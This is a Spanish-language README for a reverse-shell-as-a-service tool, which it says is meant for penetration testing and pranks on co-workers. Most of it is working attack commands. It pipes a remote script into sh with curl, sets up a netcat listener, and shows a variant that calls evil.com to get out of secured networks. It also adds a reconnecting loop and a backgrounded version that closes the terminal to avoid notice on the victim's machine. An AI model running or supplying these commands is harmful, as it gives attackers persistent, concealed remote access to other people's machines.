
Servicio de shell inversa bajo demanda que detecta automáticamente el entorno objetivo y ejecuta el payload adecuado para acceso remoto durante pruebas de penetración.
Reverse Shell como servicio - https://reverse-shell.sh
Reverse shell fácil de recordar que debería funcionar en la mayoría de sistemas tipo Unix.
Detecta el software disponible en el objetivo y ejecuta un payload apropiado.
En tu máquina, abre un puerto y escucha en él. Puedes hacerlo fácilmente con netcat.
nc -l 1337
En la máquina objetivo, canaliza la salida de https://reverse-shell.sh/tuip:puerto hacia sh.
curl https://reverse-shell.sh/192.168.0.69:1337 | sh
Vuelve a tu máquina; ahora deberías tener un prompt de shell.
Esto está pensado para pruebas de penetración o para ayudar a compañeros de trabajo a entender por qué siempre deben bloquear sus computadoras. Por favor, no lo uses para nada malicioso.
Puedes usar un nombre de host en lugar de una IP.
curl https://reverse-shell.sh/localhost:1337 | sh
Debido a que es una conexión inversa, puede atravesar firewalls y conectarse a internet.
Podrías escuchar conexiones en un servidor en evil.com y obtener una reverse shell desde una red segura con:
curl https://reverse-shell.sh/evil.com:1337 | sh
Por defecto, cuando la shell sale, pierdes la conexión. Puedes hacerlo accidentalmente con un comando inválido. Puedes crear fácilmente una shell que intente reconectarse envolviéndola en un bucle while.
while true; do curl https://reverse-shell.sh/tuip:1337 | sh; done
Ten cuidado si haces esto a un compañero; si se van de la oficina con esto aún ejecutándose, los estás exponiendo a un ataque.
La sesión de terminal debe mantenerse abierta para que la conexión reverse shell persista. Eso podría ser un poco obvio si intentas hacer una broma a compañeros de trabajo.
El siguiente comando ejecutará la reverse shell en un proceso en segundo plano y cerrará la terminal, sin dejar ventanas de terminal sospechosas abiertas en la máquina de la víctima.
Asegúrate de ejecutar esto en una ventana de terminal nueva; de lo contrario, perderás cualquier trabajo en tu sesión existente.
sh -c "curl https://reverse-shell.sh/localhost:1337 | sh -i &" && exit
MIT © Luke Childs